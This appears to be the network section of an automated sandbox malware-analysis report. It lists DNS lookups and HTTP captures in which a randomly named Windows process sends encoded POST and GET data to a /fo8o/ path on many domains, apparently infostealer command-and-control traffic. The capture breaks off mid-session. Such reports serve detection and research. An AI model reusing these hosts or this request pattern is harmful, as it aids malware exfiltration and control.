May 8, 2024 10:50:32.858745098 CEST	1.1.1.1	192.168.2.10	0xad77	Server failure (2)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:41.162220955 CEST	1.1.1.1	192.168.2.10	0x78d9	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
May 8, 2024 10:50:56.217941046 CEST	1.1.1.1	192.168.2.10	0x2bdf	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
May 8, 2024 10:50:56.217941046 CEST	1.1.1.1	192.168.2.10	0x2bdf	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:11.991306067 CEST	1.1.1.1	192.168.2.10	0xc2a2	No error (0)	www.donnavariedades.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
May 8, 2024 10:51:11.991306067 CEST	1.1.1.1	192.168.2.10	0xc2a2	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:28.112885952 CEST	1.1.1.1	192.168.2.10	0xbd23	No error (0)	www.660danm.top		34.111.148.214	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:28.112885952 CEST	1.1.1.1	192.168.2.10	0xbd23	No error (0)	www.660danm.top		34.120.249.181	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:28.113032103 CEST	1.1.1.1	192.168.2.10	0xbd23	No error (0)	www.660danm.top		34.111.148.214	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:28.113032103 CEST	1.1.1.1	192.168.2.10	0xbd23	No error (0)	www.660danm.top		34.120.249.181	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:43.415055037 CEST	1.1.1.1	192.168.2.10	0xdea0	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
May 8, 2024 10:51:43.415055037 CEST	1.1.1.1	192.168.2.10	0xdea0	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
May 8, 2024 10:51:57.408304930 CEST	1.1.1.1	192.168.2.10	0x93	No error (0)	www.joyesi.xyz		185.237.107.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.kasegitai.tokyo

www.goldenjade-travel.com

www.antonio-vivaldi.mobi

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.donnavariedades.com

www.660danm.top

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49710	154.215.72.110	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:00.795924902 CEST	500	OUT	GET /fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:49:01.118989944 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 08:49:00 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
May 8, 2024 10:49:01.329037905 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 08:49:00 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49711	202.172.28.202	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:16.936454058 CEST	770	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 45 72 63 2b 68 39 51 77 70 59 45 4b 41 6b 77 46 52 65 6f 66 48 4b 34 78 55 42 50 Data Ascii: FBEd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffErc+h9QwpYEKAkwFReofHK4xUBP
May 8, 2024 10:49:17.237772942 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:49:17 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49712	202.172.28.202	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:19.758498907 CEST	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 57 32 2f 53 30 6c 64 4c 4e 6e 4c 50 6f 6a 4b 78 4a 64 6f 35 42 6a 75 43 36 53 57 51 3d 3d Data Ascii: FBEd=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwW2/S0ldLNnLPojKxJdo5BjuC6SWQ==
May 8, 2024 10:49:20.048599958 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:49:19 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49713	202.172.28.202	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:22.568752050 CEST	1807	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 49 2f 41 58 64 75 46 44 7a 61 66 57 4f 43 32 45 6b 53 4e 50 56 77 48 2b 49 67 4b 6a 31 7a 72 62 6f 53 6f 7a 2f 6e 48 76 45 70 42 37 64 62 43 57 4e 35 33 62 36 78 63 2f 71 49 46 6a 49 4d 77 72 79 48 7a 4c 57 51 75 78 6f 61 55 55 4a 6f 6d 4f 45 51 35 34 79 4b 39 63 42 55 6e 31 47 63 4e 34 31 46 70 2f 44 4d 73 43 38 44 4e 6c 7a 54 74 71 6c 33 59 58 64 66 4f 77 64 36 73 52 61 73 61 62 4b 43 68 56 70 64 4e 75 45 7a 66 59 53 7a 74 41 47 48 49 6d 65 76 6a 77 69 71 35 39 51 79 4e 64 36 32 62 [TRUNCATED] Data Ascii: FBEd=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLI/AXduFDzafWOC2EkSNPVwH+IgKj1zrboSoz/nHvEpB7dbCWN53b6xc/qIFjIMwryHzLWQuxoaUUJomOEQ54yK9cBUn1GcN41Fp/DMsC8DNlzTtql3YXdfOwd6sRasabKChVpdNuEzfYSztAGHImevjwiq59QyNd62bitKpXw4Rg4jW10WzlGrck9QbkLhOrwwFuohgJWuuRqDV8voiIwA29At+yaUGM6yP6vu/0a+4CZFOk16nUBy6YWlF/zFH3m5bdljKTP3Am0hbXjzMECCq9YLRVVKtl1oU8j6UHNpmM4oz9Er01s4uaeUjzjRDxFw85vE3iaQJrjatXklUHdiEKhtthg9VTp88fpW0kKscfFvW35O8HmB7toFa3dvfFKWpr/WNhM6R06+4nfNbSayy0M7K2sXWbTo5hns9Rnpwf83Nb9jt05v2FwenVWKgXfBgwT7K8hS65umni+YbA/CEaSXYVZHnSyXq9tcZISDAQSedsHsW/8SJdKh9IbNBWiv8TdC4zXOuIvpUdIRvGuGR+PAh7dqGHllXkfVnFBeEYUzRUEFOWAuH3xfaUErTr3kiSaNfYqeT1MyAiBokxvVlRga1pzAwB3K2gHPua4B8PcOPK6gJuseIFhJTHLx1N9YNBh5A1Zc0aEmgqwOOXFX8bZrpfQt9h0j1I/2weWFYgm0UafX55oP+Sx92CiHzeUnwNhNoDPvePwOYCGO+Uf7GhVdXfn169bENdRJ7jPyTR0Pem2GoItNmD4BBYT4xfjRR6NJcfs4V9M99M4eVszE6k1gQm4Go+IAy53Zhz7d0VXxF2vaHMz8ABQtv6NbCIMHcB0 [TRUNCATED]
May 8, 2024 10:49:22.859085083 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:49:22 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49714	202.172.28.202	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:25.378590107 CEST	501	OUT	GET /fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tch HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.kasegitai.tokyo Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:49:25.664339066 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:49:25 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49716	116.50.37.244	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:31.591990948 CEST	788	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 39 57 2b 6c 36 4a 57 36 6c 7a 63 5a 6b 62 70 50 30 51 69 65 48 62 56 47 42 5a 47 Data Ascii: FBEd=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO9W+l6JW6lzcZkbpP0QieHbVGBZG
May 8, 2024 10:49:31.934046984 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Wed, 08 May 2024 08:49:30 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49717	116.50.37.244	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:49:34.677815914 CEST	812	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 62 49 48 73 73 4b 35 72 6a 4d 6e 42 58 78 53 51 67 38 41 38 43 78 71 63 36 6e 51 3d 3d Data Ascii: 